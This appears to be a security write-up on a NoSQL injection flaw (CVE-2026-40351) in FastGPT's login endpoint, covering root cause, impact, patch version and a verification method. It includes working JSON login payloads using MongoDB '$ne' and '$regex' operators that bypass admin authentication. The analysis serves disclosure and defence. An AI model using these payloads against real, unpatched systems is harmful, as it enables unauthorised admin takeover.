How FastGPT’s NoSQL Injection (CVE‑2026‑40351) Enables Admin Login Bypass – A Deep Dive

Vulnerability Overview

FastGPT is an AI Agent platform built on Node.js and MongoDB. In May 2026 security researchers disclosed two high‑severity NoSQL injection vulnerabilities, CVE‑2026‑40351 (CVSS 9.8) and CVE‑2026‑40352 (CVSS 8.8).

Vulnerability Mechanism

The login endpoint /api/v1/login contains simplified code:

// FastGPT login endpoint (simplified)
const user = await db.users.findOne({
  email: req.body.email,
  password: req.body.password // ← problem here
});

The req.body.password value is passed directly to the MongoDB query without type checking or sanitisation.

Because TypeScript’s as assertions and type guards exist only at compile time, an attacker can submit a payload such as:

{
  "email": "[email protected]",
  "password": { "$ne": "" }
}

The $ne operator means “not equal”. The resulting MongoDB query is equivalent to:

// Equivalent MongoDB shell query
db.users.find({
  email: "[email protected]",
  password: { $ne: "" }
});
// → returns the admin record, authentication succeeds

A variant using $regex works similarly:

{
  "email": "[email protected]",
  "password": { "$regex": ".*" }
}

Both payloads match any non‑empty password, causing the query to always succeed and bypass authentication.

Attack Data Flow

Browser/Attacker
  │ POST /api/v1/login {"email":"admin@...","password":{"$ne":""}}
  ▼
FastGPT login endpoint (Node.js + Express)
  │ No type validation on password
  │ Directly passed to MongoDB findOne()
  ▼
MongoDB
  │ Parses $ne, matches any non‑empty password
  │ Returns admin user record
  ▼
FastGPT issues JWT token
  │ Attacker obtains admin privileges
  ▼
Attacker controls AI Agent platform

Impact Beyond Login

Normal user : can read private knowledge bases and export conversation logs.

Administrator : can control all AI Agents, inject malicious prompts, and delete datasets.

Root : gains full platform control, can deploy back‑door agents and perform lateral movement inside the internal network.

Root Cause: Type Safety ≠ Runtime Safety

TypeScript’s compile‑time type system provides no protection once data crosses the HTTP boundary. Type assertions ( as) and type guards are erased at runtime, so untrusted input can be interpreted as a BSON object.

// ❌ Wrong approach: trusting the incoming type
const loginData = req.body as LoginRequest; // compiles, no runtime guard
await db.users.findOne(loginData); // attacker supplies an object instead of a string

// ✅ Correct approach: explicit runtime validation
const email = String(req.body.email);
const password = String(req.body.password);
if (typeof email !== 'string' || typeof password !== 'string') {
  return res.status(400).json({ error: 'Invalid input type' });
}
await db.users.findOne({ email, password }); // password is guaranteed to be a string

Even when using ODMs like Mongoose, schema validation is not a silver bullet; crafted objects can still bypass checks.

Patch and Mitigation

FastGPT version 4.14.9.5 addresses CVE‑2026‑40351 and CVE‑2026‑40352. The remediation includes:

Enforcing runtime type checks on the password field to ensure it is a string.

Applying a whitelist schema validation for parameters that are passed to MongoDB queries.

Introducing parameterised query logic that blocks MongoDB operators from user‑supplied input.

The vendor states that there is no effective temporary mitigation for unpatched installations; upgrading is the only safe path.

Verification Method

Affected versions: FastGPT < 4.14.9.5

Query the version via /api/v1/system/info.

Send a malicious login request in a controlled test environment:

If the response contains code: 200 and a valid JWT token, the vulnerability is present.

If the response is code: 401 or code: 400, the instance is patched.

Future Trend Forecast

NoSQL injection is not new, but rapid iteration of AI Agent platforms is causing classic issues to reappear. Three reasons are identified:

AI platforms prioritize feature releases, leaving security audits lagging.

JSON‑native API designs naturally expand the injection surface, as any user input can be a valid JSON object.

Tools like Mongoose lower the barrier to MongoDB usage but do not automatically resolve injection problems.

More authentication‑layer attacks targeting AI Agent platforms are expected. Development teams should treat input validation as an architectural decision rather than a post‑release patch.

References

https://www.yazoul.net/advisory/cve/cve-2026-40351-fastgpt-nosql-injection-grants-admin-login/

https://newclawtimes.com/articles/fastgpt-nosql-injection-cve-2026-40351-40352-agent-platform-admin-takeover/

https://www.aikido.dev/blog/axios-cve-2026-40175-a-critical-bug-thats-not-exploitable